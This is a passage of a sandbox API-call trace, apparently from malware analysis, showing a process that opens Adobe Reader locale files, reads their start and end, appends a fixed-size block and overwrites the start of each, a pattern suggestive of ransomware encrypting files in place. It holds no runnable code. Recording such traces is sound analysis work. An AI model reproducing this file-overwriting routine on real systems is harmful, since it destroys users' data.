hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0077.304] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.304] ReleaseMutex (hMutex=0x168) returned 1 [0077.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0077.304] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0077.305] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xea69 [0077.306] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.306] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xea69 [0077.306] WriteFile (in: hFile=0x1d4, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.307] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0077.307] WriteFile (in: hFile=0x1d4, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.307] CloseHandle (hObject=0x1d4) returned 1 [0077.307] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Checkers.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\checkers.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0077.308] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0077.308] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1fe00 [0077.308] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0077.308] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.308] ReleaseMutex (hMutex=0x168) returned 1 [0077.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.CAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.CAT", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.CAT", lpUsedDefaultChar=0x0) returned 12 [0077.309] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0077.310] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1ee00 [0077.310] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.311] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1ee00 [0077.312] WriteFile (in: hFile=0x1d4, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.313] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0077.313] WriteFile (in: hFile=0x1d4, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.313] CloseHandle (hObject=0x1d4) returned 1 [0077.314] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\pddom.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\pddom.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0077.314] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0077.314] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2e00 [0077.315] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0077.315] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.315] ReleaseMutex (hMutex=0x168) returned 1 [0077.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.CAT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0077.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.CAT", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.CAT", lpUsedDefaultChar=0x0) returned 9 [0077.315] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.013] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1e00 [0078.013] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.020] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1e00 [0078.020] WriteFile (in: hFile=0x1d4, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.021] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0078.021] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.021] CloseHandle (hObject=0x1d4) returned 1 [0078.021] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0078.022] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.022] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x9586 [0078.022] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.022] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.022] ReleaseMutex (hMutex=0x168) returned 1 [0078.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0078.023] ReadFile (in: hFile=0x1d4, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.045] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8586 [0078.045] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.053] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8586 [0078.053] WriteFile (in: hFile=0x1d4, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.053] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0078.054] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.054] CloseHandle (hObject=0x1d4) returned 1 [0078.065] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Annots.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\annots.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0078.066] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.066] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x76c00 [0078.067] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.067] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.067] ReleaseMutex (hMutex=0x168) returned 1 [0078.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.CZE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0078.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.CZE", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.CZE", lpUsedDefaultChar=0x0) returned 10 [0078.067] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0078.088] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x75c00 [0078.088] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.105] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x75c00 [0078.106] WriteFile (in: hFile=0x1d4, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.107] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0078.107] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0078.107] CloseHandle (hObject=0x1d4) returned 1 [0078.107] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\makeaccessible.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\makeaccessible.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0078.108] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.108] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x11a00 [0078.109] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.109] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.109] ReleaseMutex (hMutex=0x168) returned 1 [0078.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.CZE", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0078.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.CZE", cchWideChar=18, lpMultiByteStr=0x1f88ba4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.CZE", lpUsedDefaultChar=0x0) returned 18 [0078.109] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.127] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x10a00 [0078.127] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.147] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x10a00 [0078.148] WriteFile (in: hFile=0x1d4, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.148] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0078.148] WriteFile (in: hFile=0x1d4, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.149] CloseHandle (hObject=0x1d4) returned 1 [0078.149] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Search.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\search.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0078.150] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.150] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x5a00 [0078.150] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.150] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.150] ReleaseMutex (hMutex=0x168) returned 1 [0078.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.CZE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0078.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.CZE", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.CZE", lpUsedDefaultChar=0x0) returned 10 [0078.151] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.152] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4a00 [0078.152] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.153] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4a00 [0078.153] WriteFile (in: hFile=0x1d4, lpBuffer=0x25ad0d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.154] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0078.154] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.154] CloseHandle (hObject=0x1d4) returned 1 [0078.155] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Acroform.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\acroform.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0078.155] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.156] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x64600 [0078.156] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0078.156] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.156] ReleaseMutex (hMutex=0x168) returned 1 [0078.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.DAN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.DAN", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.DAN", lpUsedDefaultChar=0x0) returned 12 [0078.157] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0078.166] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x63600 [0078.166] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.507] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x63600 [0078.507] WriteFile (in: hFile=0x1d4, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.510] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0078.511] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0078.511] CloseHandle (hObject=0x1d4) returned 1 [0078.512] CreateFileW 